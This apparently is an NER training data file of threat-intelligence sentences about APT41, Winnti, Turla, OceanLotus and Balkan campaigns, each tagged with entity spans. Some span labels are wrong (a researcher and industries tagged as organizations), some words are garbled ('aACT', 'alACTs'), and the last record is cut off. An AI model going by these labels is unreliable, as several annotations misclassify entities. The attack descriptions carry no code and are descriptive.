{"text": "Cylance uncovered several bespoke backdoors deployed by the OceanLotus APT Group a.k.a APT32 , Cobalt Kitty . Winnti mode of operation to collect information on the organizational charts of companies , on cooperating departments , on the IT systems of individual business units , and on trade secrets , obviously . Hackers usually take precautions , which experts refer to as Opsec .", "spans": [{"start": 0, "end": 7, "label": "Organization"}, {"start": 60, "end": 70, "label": "Organization"}, {"start": 87, "end": 92, "label": "Organization"}, {"start": 95, "end": 107, "label": "Organization"}, {"start": 110, "end": 116, "label": "Organization"}, {"start": 180, "end": 199, "label": "Organization"}, {"start": 252, "end": 277, "label": "Organization"}, {"start": 315, "end": 322, "label": "Organization"}]}
{"text": "While continuing to monitor activity of the OceanLotus APT Group , Cylance researchers uncovered a novel payload loader that utilizes steganography to read an encrypted payload concealed within a .png image file . The Winnti group\u2019s Opsec was dismal to say the least . This mode of operation is typical of many hacker groups\u2014and especially of Winnti .", "spans": [{"start": 44, "end": 54, "label": "Organization"}, {"start": 67, "end": 74, "label": "Organization"}, {"start": 218, "end": 224, "label": "Organization"}, {"start": 311, "end": 317, "label": "Organization"}, {"start": 343, "end": 349, "label": "Organization"}]}
{"text": "Gobelin Panda , a.k.a Goblin Panda , is a group that has been identified by CrowdStrike as a Chinese threat actor . They are a very , very persistent group , \u201d says Costin Raiu , who has been watching Winnti since 2011 .", "spans": [{"start": 0, "end": 13, "label": "Organization"}, {"start": 22, "end": 34, "label": "Organization"}, {"start": 76, "end": 87, "label": "Organization"}, {"start": 165, "end": 176, "label": "Organization"}, {"start": 201, "end": 207, "label": "Organization"}]}
{"text": "CrowdStrike observed Goblin Panda activity spike as tensions among South China Sea nations has risen . Raiu and his team have followed the digital tracks left behind by some of the Winnti hackers .", "spans": [{"start": 0, "end": 11, "label": "Organization"}, {"start": 21, "end": 33, "label": "Organization"}, {"start": 103, "end": 107, "label": "Organization"}, {"start": 181, "end": 187, "label": "Organization"}]}
{"text": "This confirms Tropic Trooper is using Poison Ivy as part of their toolkit , something speculated in the original Trend Micro report but not confirmed by them . One government official puts it very matter-of-factly: Winnti is very specific to Germany .", "spans": [{"start": 14, "end": 28, "label": "Organization"}, {"start": 38, "end": 48, "label": "System"}, {"start": 113, "end": 124, "label": "Organization"}, {"start": 215, "end": 221, "label": "Organization"}]}
{"text": "In a 2018 blogpost , ESET researchers predicted that Turla would use more and more generic tools . By 2014 , the Winnti malware code was no longer limited to game manufacturers . Winnti is targeting high-tech companies as well as chemical and pharmaceutical companies . Winnti is attacking companies in Japan , France , the U.S. and Germany . The Winnti hackers broke into Henkel\u2019s network in 2014 . Henkel confirms the Winnti incident and issues the following statement: The cyberattack was discovered in the summer of 2014 and Henkel promptly took all necessary precautions . Far from attacking Henkel and the other companies arbitrarily , Winnti takes a highly strategic approach . The hackers behind Winnti have also set their sights on Japan\u2019s biggest chemical company , Shin-Etsu Chemical . In the case of another Japanese company , Sumitomo Electric , Winnti apparently penetrated their networks during the summer of 2016 . Winnti hackers also penetrated the BASF and Siemens networks . Thanks to this tool , we found out back in March 2019 that the Bayer pharmaceutical group had been hacked by Winnti . At Gameforge , the Winnti hackers had already been removed from the networks when a staff member noticed a Windows start screen with Chinese characters . To witnesses , the spy appears to be running a program showing videos , presenting slides ( Prezi ) , playing a computer game or even running a fake virus scanner .", "spans": [{"start": 21, "end": 25, "label": "Organization"}, {"start": 53, "end": 58, "label": "Organization"}, {"start": 113, "end": 119, "label": "Organization"}, {"start": 158, "end": 176, "label": "Organization"}, {"start": 179, "end": 185, "label": "Organization"}, {"start": 199, "end": 218, "label": "Organization"}, {"start": 243, "end": 267, "label": "Organization"}, {"start": 270, "end": 276, "label": "Organization"}, {"start": 347, "end": 353, "label": "Organization"}, {"start": 373, "end": 381, "label": "Organization"}, {"start": 400, "end": 406, "label": "Organization"}, {"start": 420, "end": 426, "label": "Organization"}, {"start": 597, "end": 603, "label": "Organization"}, {"start": 642, "end": 648, "label": "Organization"}, {"start": 704, "end": 710, "label": "Malware"}, {"start": 757, "end": 773, "label": "Organization"}, {"start": 776, "end": 794, "label": "Organization"}, {"start": 839, "end": 856, "label": "Organization"}, {"start": 859, "end": 865, "label": "Organization"}, {"start": 931, "end": 937, "label": "Organization"}, {"start": 966, "end": 970, "label": "Organization"}, {"start": 975, "end": 982, "label": "Organization"}, {"start": 983, "end": 991, "label": "Organization"}, {"start": 1057, "end": 1077, "label": "Organization"}, {"start": 1103, "end": 1109, "label": "Organization"}, {"start": 1115, "end": 1124, "label": "Organization"}, {"start": 1131, "end": 1137, "label": "Organization"}, {"start": 1219, "end": 1226, "label": "System"}, {"start": 1285, "end": 1288, "label": "Organization"}, {"start": 1338, "end": 1355, "label": "Malware"}, {"start": 1358, "end": 1363, "label": "Malware"}]}
{"text": "ESET researchers will continue monitoring new Turla activities and will publish relevant information on our blog . From the time of file creation , the attacker started working at least as early as July 2018 . The link to feeds.rapidfeeds.com left in its XML configuration file was also mentioned by Kaspersky\u2019s report in the reference section , which confirms that the APT-C-09 group keeps updating its C2 configuration channel and the recent one reserves some past features . For example , Donot and Bitter disguised as Kashmiri Voice to attack Pakistan , Transparent Tribe attacked India with decoy document regarding terrorist attacks in Kashmir . Considering APT-C-09 , Bitter and Donot have carried out targeted attacks against China , we must take actions in advance and keep a close eye on their recent activities . APT41 espionage operations against the healthcare , high-tech , and telecommunications sectors include establishing and maintaining strategic access , and through mid-2015 , the theft of intellectual property . FireEye Threat Intelligence assesses with high confidence that APT41 carries out an array of financially motivated intrusions , particularly against the video game industry , including stealing source code and digital certificates , virtual currency manipulation , and attempting to deploy ransomware . APT41 has executed multiple software supply chain compromises , gaining access to software companies to inject malicious code into legitimate files before distributing updates . APT41 is unique among tracked China-based actors in that it leverages non-public malware typically reserved for espionage operations in what appears to be activity that falls outside the scope of state-sponsored missions . Based on early observed activity , consistent behavior , and APT41's unusual focus on the video game industry , we believe the group's cyber crime activities are most likely motivated by personal financial gain or hobbyist interests . APT41 campaigns include most of the incidents previously attributed in FireEye Threat Intelligence reporting to GREF Team and a number of additional clusters that were previously unnamed . Activity traces back to 2012 when individual members of APT41 conducted primarily financially motivated operations focused on the video game industry before expanding into likely statesponsored activity . Learning to access video game production environments enabled APT41 to develop the tactics , techniques , and procedures (TTPs) that were later leveraged against software companies to inject malicious code into software updates . APT41 has targeted organizations in 14 countries over seven years , including: France , India , Italy , Japan , Myanmar , the Netherlands , Singapore , South Korea , South Africa , Switzerland , Thailand , Turkey , the United Kingdom , and the United States (Figure 1) . APT41 espionage operations against entities in these countries follow targeting of verticals consistent with Chinese national policy priorities . We believe that like other Chinese espionage operators , APT41 has moved toward strategic intelligence collection and establishing access , but aACT from direct intellectual property theft . In 2014 , APT41 was observed carrying out espionage campaigns concurrently with financially motivated intrusions , demonstrating that they could balance different objectives simultaneously . Since 2017 , APT41's activities have included a series of supply chain compromises . The group also targeted companies involved in producing motherboards , processors , and server solutions for enterprises . Since 2013 , APT41 has targeted organizations involved in the research , development , and sale of computer components used for machine-learning , autonomous vehicles , medical imaging , and the consumer market . In a 2014 compromise , APT41 targeted a European conglomerate and specifically focused on systems physically located in China . In spring 2015 , APT41 targeted information related to two entities undergoing a merger announced the previous year . Since 2017 , APT41 has consistently targeted telecommunications companies , possibly a crucial first step to establish a foothold in targeting a particular region . Targeted telecom companies spanned several countries , and recently identified intrusions were concentrated in countries where we had not identified any prior APT41 activity . In July and August 2016 , APT41 sent spear-phishing emails to Hong Kong media organizations known for pro-democracy editorial content . This was the first instance we have observed of APT41 targeting pro-democracy groups in Hong Kong . APT41 frequently leverages timely news stories as the lure content in their spear-phishing emails , although social engineering content does not alACTs correlate with targeted users or organizations . In 2015 , APT41 targeted a Japanese media organization with a lure document (Figure 3) titled \u4e2d\u6771\u547c\u5438\u5668\u75c7\u5019 \u7fa4(MERS)\u306e\u4e88\u9632 , \u201d which translates to Prevention of Middle East Respiratory Syndrome (MERS) . APT41 activity aimed at medical device companies and pharmaceuticals is demonstrative of the group's capacity to collect sensitive and highly valuable intellectual property (IP) , although we have not observed evidence of IP theft since late 2015 . Unlike other observed Chinese espionage operators , APT41 conducts explicit financially motivated activity , which has included the use of tools that are otherwise exclusively used in campaigns supporting state interests . Although APT41 initially targeted the parent company , 30 percent of the victimized hosts were related to a subsidiary specialized in manufacturing medical devices . In 2018 , we observed APT41 target a third healthcare company , although their goals during this compromise were unclear . In June 2018 , APT41 sent spear-phishing emails using an invitation lure to join a decentralized gaming platform linked to a cryptocurrency service (Figure 5) that had positioned itself as a medium of exchange for online games and gambling sites . This provides another connection between the targeting of the cryptocurrency organizations and video game targeting . In October 2018 , the group compiled an instance of XMRig , a Monero cryptocurrency mining tool , demonstrating a continued interest in cryptocurrency . APT41 campaigns focused on the video game sector have largely affected studios and distributors in East and Southeast Asia , although global companies based in the United States have also been targeted . APT41 continuously returns to targeting the video game sector and seems to have matured its campaigns through lessons learned in operations against the industry . We believe these operations include broadly malicious activity that can enable further operations , such as targeting game source code and compromising digital certificates , while other activities are explicitly financially motivated , such as abusing in-game currency mechanics . In October 2012 , APT41 used captured credentials to compromise a jump server and access a production environment where they deployed a Linux version of PHOTO . Since at least 2012 , APT41 has repeatedly gained access to game development environments within affected companies , including online multiplayer networks , as well as targeting of production database administrators . APT41 has been observed inserting malicious code into legitimate video game files to distribute malware . In 2018 , the group inserted CRACKSHOT malware into game files that were signed with legitimate codesigning certificates , most likely indicating access to the production environment , which facilitated a supply chain compromise . We have also observed APT41 limitedly deploy rootkits on Linux systems and Master Boot Record (MBR) bootkits , such as ROCKBOOT , on Windows systems to hide their malware and maintain persistence on victim systems . Selective deployment of ROCKBOOT suggests that APT41 reserves more advanced TTPs and malware only for high-value targets . APT41 has blatantly engaged in financially motivated activity targeting the video game industry , including manipulating virtual currencies . In a highly unusual case , APT41 attempted to extort a game company by deploying the Encryptor RaaS ransomware . APT41 is well-known for leveraging compromised digital certificates from video game studios to sign malware . We suggest that APT41 sought to target in-game currency but found they could not monetize the specific targeted game , so the group resorted to ransomware to attempt to salvage their efforts and profit from the compromise . APT41 has also used credentials compromised in previous operations . In 2014 , APT41 compromised an online billing/payment service using VPN access between a third-party service provider and the targeted payment service . Although we do not have first-hand evidence of APT41's compromise of TeamViewer , we have observed APT41 use compromised TeamViewer credentials as an entry point at multiple organizations . Public reports of supply chain compromises linked to APT41 date back to at least 2014 , and technical evidence associated with these incidents was used to determine a relationship , if any , with APT41 . As demonstrated in operations targeting the video game industry , APT41 leverages a variety of TTPs to access production environments where they can inject malicious code into legitimate files . In March 2017 , suspected Chinese espionage operators targeted CCleaner , a utility that assists in the removal of unwanted files from a computer . In July 2017 , APT41 injected malicious code into a software update package maintained by Netsarang and signed it with a legitimate Netsarang certificate in an operation referred to as ShadowPad by Kaspersky . Both APT41 and the actors in the CCleaner incident used TeamViewer during initial compromise . Supply chain compromises are most likely an extension of APT41's tactics used in gaining access to gaming development environments and to other gaming organizations via third-party service providers . Beginning in July 2018 , APT41 appeared to have directly targeted several East and Southeast Asia-based video game developers and distributors to inject legitimate executables with the CRACKSHOT backdoor . The lure used to target the cryptocurrency exchange (displayed in Figure 5 and translated in Figure 6) referenced an online gaming platform , tying the cryptocurrency targeting to APT41's focus on video game-related targeting . FireEye malware analysis identified source code overlaps between malware used by APT41 in May 2016 targeting of a U.S.-based game development studio and the malware observed in supply chain compromises in 2017 and 2018 . In May 2016 , APT41 deployed a POISONPLUG sample at a U.S.-based game development studio . Alternatively , it is also possible that APT41 injected malicious code into the package prior to compilation , circumventing the need to steal the code-signing certificate and compile it on their own . Either APT41 is operating outside of state control but still working with other Chinese APT malware actors , tools , and infrastructure on a parttime or contractual basis , or APT41 is a full-time . APT41 uses many of the same tools and compromised digital certificates that have been leveraged by other Chinese espionage operators . Initial reports about HIGHNOON and its variants reported publicly as Winnti dating back to at least 2013 indicated the tool was exclusive to a single group , contributing to significant conflation across multiple distinct espionage operations . APT41 has used several malware families that have also been used by other Chinese espionage operators , including variants of HIGHNOON , HOMEUNIX , PHOTO , SOGU , and ZXSHELL , among others . HIGHNOON , one of the main code families observed being used by APT41 , was also used by APT17 in 2015 to target semiconductor and chemical manufacturers . HOMEUNIX , another popular backdoor used by APT41 , has been used by at least 14 separate Chinese espionage groups , including APT1 , APT10 , APT17 , APT18 , and APT20 . APT41 has used CROSSWALK.BIN , a kernel driver , to circumvent firewalls and covertly send data . Another Chinese espionage group used a similar tool , CLASSFON , to covertly proxy network communications in 2011 . At least two of these malware families , HIGHNOON.CLI and GEARSHIFT , have been used by APT17 and another suspected Chinese espionage group . APT41 regularly leverages code-signing certificates to sign malware when targeting both gaming and nongaming organizations . In July 2017 , APT41 initiated a TeamViewer session and transferred files that were later deleted . In these instances , APT41 leveraged TeamViewer to transfer malware into the compromised environment , although we do not have direct evidence of APT41 compromising TeamViewer . In May 2018 , APT41 used TeamViewer for initial entry in the compromise of a healthcare company . Notably , APT41 was observed using proof-of-concept exploit code for CVE-2019-3396 within 23 days after the Confluence . APT41 has targeted payment services specializing in handling in-game transactions and real money transfer (RMT) purchases .", "spans": [{"start": 0, "end": 4, "label": "Organization"}, {"start": 46, "end": 51, "label": "Organization"}, {"start": 152, "end": 160, "label": "Organization"}, {"start": 255, "end": 258, "label": "System"}, {"start": 300, "end": 311, "label": "Organization"}, {"start": 370, "end": 378, "label": "Organization"}, {"start": 404, "end": 406, "label": "System"}, {"start": 492, "end": 497, "label": "Organization"}, {"start": 502, "end": 508, "label": "Organization"}, {"start": 664, "end": 672, "label": "Organization"}, {"start": 675, "end": 681, "label": "Organization"}, {"start": 686, "end": 691, "label": "Organization"}, {"start": 824, "end": 829, "label": "Organization"}, {"start": 863, "end": 873, "label": "Organization"}, {"start": 876, "end": 885, "label": "Organization"}, {"start": 892, "end": 918, "label": "Organization"}, {"start": 1035, "end": 1042, "label": "Organization"}, {"start": 1098, "end": 1103, "label": "Organization"}, {"start": 1188, "end": 1207, "label": "Organization"}, {"start": 1338, "end": 1343, "label": "Organization"}, {"start": 1516, "end": 1521, "label": "Organization"}, {"start": 1800, "end": 1807, "label": "Organization"}, {"start": 1829, "end": 1848, "label": "Organization"}, {"start": 1974, "end": 1979, "label": "Organization"}, {"start": 2045, "end": 2052, "label": "Organization"}, {"start": 2219, "end": 2224, "label": "Organization"}, {"start": 2430, "end": 2435, "label": "Organization"}, {"start": 2598, "end": 2603, "label": "Organization"}, {"start": 2869, "end": 2874, "label": "Organization"}, {"start": 2904, "end": 2912, "label": "Organization"}, {"start": 3072, "end": 3077, "label": "Organization"}, {"start": 3216, "end": 3221, "label": "Organization"}, {"start": 3410, "end": 3417, "label": "Organization"}, {"start": 3528, "end": 3550, "label": "Organization"}, {"start": 3553, "end": 3563, "label": "Organization"}, {"start": 3570, "end": 3586, "label": "Organization"}, {"start": 3618, "end": 3623, "label": "Organization"}, {"start": 3637, "end": 3650, "label": "Organization"}, {"start": 3733, "end": 3749, "label": "Organization"}, {"start": 3752, "end": 3771, "label": "Organization"}, {"start": 3774, "end": 3789, "label": "Organization"}, {"start": 3800, "end": 3815, "label": "Organization"}, {"start": 3841, "end": 3846, "label": "Organization"}, {"start": 3858, "end": 3879, "label": "Organization"}, {"start": 3963, "end": 3968, "label": "Organization"}, {"start": 4077, "end": 4082, "label": "Organization"}, {"start": 4109, "end": 4137, "label": "Organization"}, {"start": 4238, "end": 4255, "label": "Organization"}, {"start": 4388, "end": 4393, "label": "Organization"}, {"start": 4431, "end": 4436, "label": "Organization"}, {"start": 4457, "end": 4463, "label": "System"}, {"start": 4467, "end": 4482, "label": "Organization"}, {"start": 4589, "end": 4594, "label": "Organization"}, {"start": 4605, "end": 4618, "label": "Organization"}, {"start": 4641, "end": 4646, "label": "Organization"}, {"start": 4732, "end": 4738, "label": "System"}, {"start": 4852, "end": 4857, "label": "Organization"}, {"start": 4869, "end": 4896, "label": "Organization"}, {"start": 5035, "end": 5040, "label": "Organization"}, {"start": 5059, "end": 5083, "label": "Organization"}, {"start": 5257, "end": 5259, "label": "Indicator"}, {"start": 5336, "end": 5341, "label": "Organization"}, {"start": 5360, "end": 5371, "label": "Organization"}, {"start": 5516, "end": 5521, "label": "Organization"}, {"start": 5545, "end": 5559, "label": "Organization"}, {"start": 5695, "end": 5700, "label": "Organization"}, {"start": 5710, "end": 5726, "label": "Organization"}, {"start": 5811, "end": 5816, "label": "Organization"}, {"start": 5837, "end": 5843, "label": "System"}, {"start": 6106, "end": 6134, "label": "Organization"}, {"start": 6139, "end": 6159, "label": "Organization"}, {"start": 6214, "end": 6219, "label": "Malware"}, {"start": 6315, "end": 6320, "label": "Organization"}, {"start": 6346, "end": 6363, "label": "Organization"}, {"start": 6449, "end": 6465, "label": "Organization"}, {"start": 6519, "end": 6524, "label": "Organization"}, {"start": 6563, "end": 6580, "label": "Organization"}, {"start": 6800, "end": 6816, "label": "Malware"}, {"start": 6834, "end": 6854, "label": "Malware"}, {"start": 6982, "end": 6987, "label": "Organization"}, {"start": 7100, "end": 7105, "label": "System"}, {"start": 7147, "end": 7152, "label": "Organization"}, {"start": 7253, "end": 7280, "label": "Organization"}, {"start": 7327, "end": 7341, "label": "Organization"}, {"start": 7344, "end": 7349, "label": "Organization"}, {"start": 7703, "end": 7708, "label": "Organization"}, {"start": 7738, "end": 7743, "label": "System"}, {"start": 7756, "end": 7774, "label": "System"}, {"start": 7775, "end": 7780, "label": "System"}, {"start": 7800, "end": 7808, "label": "Malware"}, {"start": 7814, "end": 7821, "label": "System"}, {"start": 7921, "end": 7929, "label": "Organization"}, {"start": 7944, "end": 7949, "label": "Organization"}, {"start": 8020, "end": 8025, "label": "Organization"}, {"start": 8096, "end": 8115, "label": "Organization"}, {"start": 8189, "end": 8194, "label": "Organization"}, {"start": 8275, "end": 8280, "label": "Organization"}, {"start": 8401, "end": 8406, "label": "Organization"}, {"start": 8609, "end": 8614, "label": "Organization"}, {"start": 8688, "end": 8693, "label": "Organization"}, {"start": 8746, "end": 8749, "label": "System"}, {"start": 8779, "end": 8795, "label": "Organization"}, {"start": 8813, "end": 8820, "label": "Organization"}, {"start": 8821, "end": 8828, "label": "Organization"}, {"start": 8900, "end": 8910, "label": "Malware"}, {"start": 8930, "end": 8935, "label": "Organization"}, {"start": 9074, "end": 9079, "label": "Organization"}, {"start": 9217, "end": 9222, "label": "Organization"}, {"start": 9291, "end": 9296, "label": "Organization"}, {"start": 9309, "end": 9324, "label": "Malware"}, {"start": 9446, "end": 9473, "label": "Organization"}, {"start": 9583, "end": 9588, "label": "Organization"}, {"start": 9766, "end": 9775, "label": "Organization"}, {"start": 9783, "end": 9788, "label": "Organization"}, {"start": 9834, "end": 9844, "label": "Malware"}, {"start": 9930, "end": 9937, "label": "Organization"}, {"start": 10099, "end": 10104, "label": "Organization"}, {"start": 10178, "end": 10199, "label": "Organization"}, {"start": 10460, "end": 10467, "label": "Organization"}, {"start": 10477, "end": 10495, "label": "Organization"}, {"start": 10508, "end": 10515, "label": "Organization"}, {"start": 10589, "end": 10594, "label": "Organization"}, {"start": 10633, "end": 10649, "label": "Organization"}, {"start": 10743, "end": 10748, "label": "Organization"}, {"start": 10861, "end": 10866, "label": "Organization"}, {"start": 11029, "end": 11034, "label": "Organization"}, {"start": 11198, "end": 11203, "label": "Organization"}, {"start": 11221, "end": 11226, "label": "Organization"}, {"start": 11271, "end": 11291, "label": "Malware"}, {"start": 11378, "end": 11386, "label": "Indicator"}, {"start": 11425, "end": 11431, "label": "Organization"}, {"start": 11601, "end": 11606, "label": "Organization"}, {"start": 11727, "end": 11735, "label": "Malware"}, {"start": 11738, "end": 11746, "label": "Malware"}, {"start": 11749, "end": 11754, "label": "Malware"}, {"start": 11757, "end": 11761, "label": "Malware"}, {"start": 11768, "end": 11775, "label": "Malware"}, {"start": 11793, "end": 11801, "label": "Malware"}, {"start": 11857, "end": 11862, "label": "Organization"}, {"start": 11882, "end": 11887, "label": "Organization"}, {"start": 11906, "end": 11919, "label": "Organization"}, {"start": 11924, "end": 11946, "label": "Organization"}, {"start": 11949, "end": 11957, "label": "Malware"}, {"start": 11976, "end": 11984, "label": "Malware"}, {"start": 11993, "end": 11998, "label": "Organization"}, {"start": 12057, "end": 12063, "label": "Organization"}, {"start": 12076, "end": 12080, "label": "Organization"}, {"start": 12083, "end": 12088, "label": "Organization"}, {"start": 12091, "end": 12096, "label": "Organization"}, {"start": 12099, "end": 12104, "label": "Organization"}, {"start": 12111, "end": 12116, "label": "Organization"}, {"start": 12119, "end": 12124, "label": "Organization"}, {"start": 12134, "end": 12147, "label": "Malware"}, {"start": 12271, "end": 12279, "label": "Malware"}, {"start": 12374, "end": 12386, "label": "Malware"}, {"start": 12391, "end": 12400, "label": "Malware"}, {"start": 12421, "end": 12426, "label": "Organization"}, {"start": 12475, "end": 12480, "label": "Organization"}, {"start": 12501, "end": 12526, "label": "Malware"}, {"start": 12574, "end": 12597, "label": "Organization"}, {"start": 12615, "end": 12620, "label": "Organization"}, {"start": 12721, "end": 12726, "label": "Organization"}, {"start": 12737, "end": 12747, "label": "Malware"}, {"start": 12846, "end": 12851, "label": "Organization"}, {"start": 12892, "end": 12897, "label": "Organization"}, {"start": 12903, "end": 12913, "label": "Malware"}, {"start": 12955, "end": 12965, "label": "Organization"}, {"start": 12966, "end": 12973, "label": "Organization"}, {"start": 12986, "end": 12991, "label": "Organization"}, {"start": 13028, "end": 13035, "label": "Vulnerability"}, {"start": 13045, "end": 13058, "label": "Vulnerability"}, {"start": 13097, "end": 13102, "label": "Organization"}, {"start": 13116, "end": 13132, "label": "Organization"}]}
{"text": "ESET researchers analyze new TTPs attributed to the Turla group that leverage PowerShell to run malware in-memory only . The group will also use a compromised account to create scheduled tasks on systems or modify legitimate Windows services to install the HIGHNOON and SOGU backdoors . APT41 uses multiple methods to perform lateral movement in an environment , including RDP sessions , using stolen credentials , adding accounts to User and Admin groups , and password brute-forcing utilities . To maintain presence , APT41 relies on backdoors , a Sticky Keys vulnerability , scheduled tasks , bootkits , rootkits , registry modifications , and creating or modifying startup files . APT41 leveraged ROCKBOOT as a persistence mechanism for PHOTO and TERA backdoors . APT41 has also been observed modifying firewall rules to enable file and printer sharing to allow for inbound Server Message Block (SMB) traffic .", "spans": [{"start": 0, "end": 4, "label": "Organization"}, {"start": 52, "end": 57, "label": "Organization"}, {"start": 78, "end": 88, "label": "System"}, {"start": 225, "end": 232, "label": "System"}, {"start": 257, "end": 265, "label": "Malware"}, {"start": 270, "end": 284, "label": "Malware"}, {"start": 287, "end": 292, "label": "Organization"}, {"start": 520, "end": 525, "label": "Organization"}, {"start": 550, "end": 561, "label": "Malware"}, {"start": 578, "end": 593, "label": "Malware"}, {"start": 596, "end": 604, "label": "Malware"}, {"start": 607, "end": 615, "label": "Malware"}, {"start": 618, "end": 640, "label": "Malware"}, {"start": 685, "end": 690, "label": "Organization"}, {"start": 701, "end": 709, "label": "Malware"}, {"start": 768, "end": 773, "label": "Organization"}, {"start": 878, "end": 898, "label": "System"}, {"start": 899, "end": 904, "label": "System"}]}
{"text": "ESET have been tracking the malicious activities related to the Ke3chang group . In some instances , APT41 leveraged POISONPLUG as a first-stage backdoor to deploy the HIGHNOON backdoor in the targeted environment . The group also deploys the SOGU and CROSSWALK malware families as means to maintain presence . APT41 sent spear-phishing emails to multiple HR employees three days after the compromise had been remediated and systems were brought back online . APT41 also deploys the SOGU and CROSSWALK malware families as means to maintain presence . Within hours of a user opening the malicious attachment dropping a HOMEUNIX backdoor , APT41 regained a foothold within the environment by installing PHOTO on the organization's servers across multiple geographic regions . Before attempting to deploy the publicly available Ransomware-as-a-Service (RaaS) Encryptor RaaS through group policy , APT41 blocked victim systems from retrieving anti-virus updates by accessing the DNS management console and implementing a forward lookup on the domain used for anti-virus updates to the park IP address 1.1.1.1 . APT41 has been observed creating a RAR archive of targeted files for Exfiltration . APT41 is unique among tracked China-based actors in that it leverages non-public malware typically reserved for espionage campaigns in what appears to be activity for personal gain . During multiple engagements , APT41 attempted to remove evidence of some of its activity by deleting Bash histories , clearing Windows security and system events , and modifying DNS management to avoid anti-virus detections . Explicit financially-motivated targeting is unusual among Chinese statesponsored threat groups , and evidence suggests APT41 has conducted simultaneous cyber crime and Cyber Espionage operations from 2014 onward . APT41 operations against higher education , travel services , and news/media firms provide some indication that the group also tracks individuals and conducts surveillance . For example , the group has repeatedly targeted call record information at telecom companies . APT41 has established and maintained strategic access to organizations in the healthcare , high-tech , and telecommunications sectors . The group\u2019s financially motivated activity has primarily focused on the video game industry , where APT41 has manipulated virtual currencies and even attempted to deploy ransomware . In another instance , APT41 targeted a hotel\u2019s reservation systems ahead of Chinese officials staying there , suggesting the group was tasked to reconnoiter the facility for security reasons . These supply chain compromise tactics have also been characteristic of APT41\u2019s best known and most recent espionage campaigns . Interestingly , despite the significant effort required to execute supply chain compromises and the large number of affected organizations , APT41 limits the deployment of follow-on malware to specific victim systems by matching against individual system identifiers . Mapping the group\u2019s activities since 2012 (Figure 2) also provides some indication that APT41 primarily conducts financially motivated operations outside of their normal day jobs . The latter is especially notable because APT41 has repeatedly returned to targeting the video game industry and we believe these activities were formative in the group\u2019s later espionage operations . APT41 leverages an arsenal of over 46 different malware families and tools to accomplish their missions , including publicly available utilities , malware shared with other Chinese espionage operations , and tools unique to the group . Once in a victim organization , APT41 can leverage more sophisticated TTPs and deploy additional malware . APT41 often relies on spear-phishing emails with attachments such as compiled HTML ( .chm ) files to initially compromise their victims .", "spans": [{"start": 0, "end": 4, "label": "Organization"}, {"start": 64, "end": 72, "label": "Organization"}, {"start": 101, "end": 106, "label": "Organization"}, {"start": 117, "end": 127, "label": "Malware"}, {"start": 168, "end": 185, "label": "Malware"}, {"start": 311, "end": 316, "label": "Organization"}, {"start": 337, "end": 343, "label": "System"}, {"start": 460, "end": 465, "label": "Organization"}, {"start": 483, "end": 487, "label": "Malware"}, {"start": 492, "end": 501, "label": "Malware"}, {"start": 618, "end": 635, "label": "Malware"}, {"start": 638, "end": 643, "label": "Organization"}, {"start": 701, "end": 706, "label": "Malware"}, {"start": 894, "end": 899, "label": "Organization"}, {"start": 975, "end": 978, "label": "Indicator"}, {"start": 1086, "end": 1088, "label": "Indicator"}, {"start": 1107, "end": 1112, "label": "Organization"}, {"start": 1191, "end": 1196, "label": "Organization"}, {"start": 1404, "end": 1409, "label": "Organization"}, {"start": 1719, "end": 1724, "label": "Organization"}, {"start": 1814, "end": 1819, "label": "Organization"}, {"start": 1839, "end": 1855, "label": "Organization"}, {"start": 1858, "end": 1873, "label": "Organization"}, {"start": 1880, "end": 1896, "label": "Organization"}, {"start": 2063, "end": 2070, "label": "Organization"}, {"start": 2071, "end": 2080, "label": "Organization"}, {"start": 2083, "end": 2088, "label": "Organization"}, {"start": 2161, "end": 2171, "label": "Organization"}, {"start": 2174, "end": 2183, "label": "Organization"}, {"start": 2190, "end": 2208, "label": "Organization"}, {"start": 2209, "end": 2216, "label": "Organization"}, {"start": 2291, "end": 2310, "label": "Organization"}, {"start": 2319, "end": 2324, "label": "Organization"}, {"start": 2424, "end": 2429, "label": "Organization"}, {"start": 2666, "end": 2673, "label": "Organization"}, {"start": 2864, "end": 2869, "label": "Organization"}, {"start": 3080, "end": 3085, "label": "Organization"}, {"start": 3214, "end": 3219, "label": "Organization"}, {"start": 3261, "end": 3280, "label": "Organization"}, {"start": 3372, "end": 3377, "label": "Organization"}, {"start": 3420, "end": 3436, "label": "Malware"}, {"start": 3441, "end": 3446, "label": "Malware"}, {"start": 3640, "end": 3645, "label": "Organization"}, {"start": 3715, "end": 3720, "label": "Organization"}, {"start": 3752, "end": 3758, "label": "System"}, {"start": 3793, "end": 3797, "label": "System"}, {"start": 3800, "end": 3804, "label": "Indicator"}]}
{"text": "According to Kaspersky Lab\u2019s report , NetTraveler has been active since as early as 2004; however , the highest volume of activity occurred from 2010 \u2013 2013 . APT41 has also deployed rootkits and Master Boot Record (MBR) bootkits on a limited basis to hide their malware and maintain persistence on select victim systems . The limited use of these tools by APT41 suggests the group reserves more advanced TTPs and malware only for high-value targets . Like other Chinese espionage operators , APT41 appears to have moved toward strategic intelligence collection and establishing access and aACT from direct intellectual property theft since 2015 . This shift , however , has not affected the group's consistent interest in targeting the video game industry for financially motivated reasons . BalkanRAT enables the attacker to remotely control the compromised computer via a graphical interface , i.e. , manually; BalkanDoor enables them to remotely control the compromised computer via a command line , i.e. , possibly en masse . With the contents of the emails , included links and decoy PDFs all involving taxes , the attackers are apparently targeting the financial departments of organizations in the Balkans region . Some parts of the campaign were briefly described by a Serbian security provider in 2016 and the Croatian CERT in 2017 . The campaign has been active at least from January 2016 to the time of writing the most recent detections in our telemetry are from July 2019 . Our findings show that the mentioned attacks have been orchestrated and we consider them a single long-term campaign that spans Croatia , Serbia , Montenegro , and Bosnia and Herzegovina . We\u2019ve discovered a new version of BalkanDoor with a new method for execution/installation: an exploit of the WinRAR ACE vulnerability CVE-2018-20250 . Both BalkanRAT and BalkanDoor spread in Croatia , Serbia , Montenegro , and Bosnia and Herzegovina . According to our telemetry , the campaign spreading these tools has been live since 2016 , with the most recent detections as late as in July 2019 . In some of the latest samples of BalkanDoor detected in 2019 , the malware is distributed as an ACE archive , disguised as a RAR archive (i.e. , not an executable file) , specially crafted to exploit the WinRAR ACE vulnerability CVE-2018-20250 . Via the BalkanDoor backdoor , the attacker sends a backdoor command to unlock the screen\u2026 and using BalkanRAT , they can do whatever they want on the computer . The BalkanDoor backdoor does not implement any Exfiltration channel . APT41 leveraged ADORE.XSEC , a Linux backdoor launched by the Adore-NG rootkit , throughout an organization's Linux environment . The backdoor can connect to any of the C&Cs from a hardcoded list \u2013 a measure to increase resilience . The main part of the BalkanRAT malware is a copy of the Remote Utilities software for remote access . Interestingly , some of the APT41's POISONPLUG 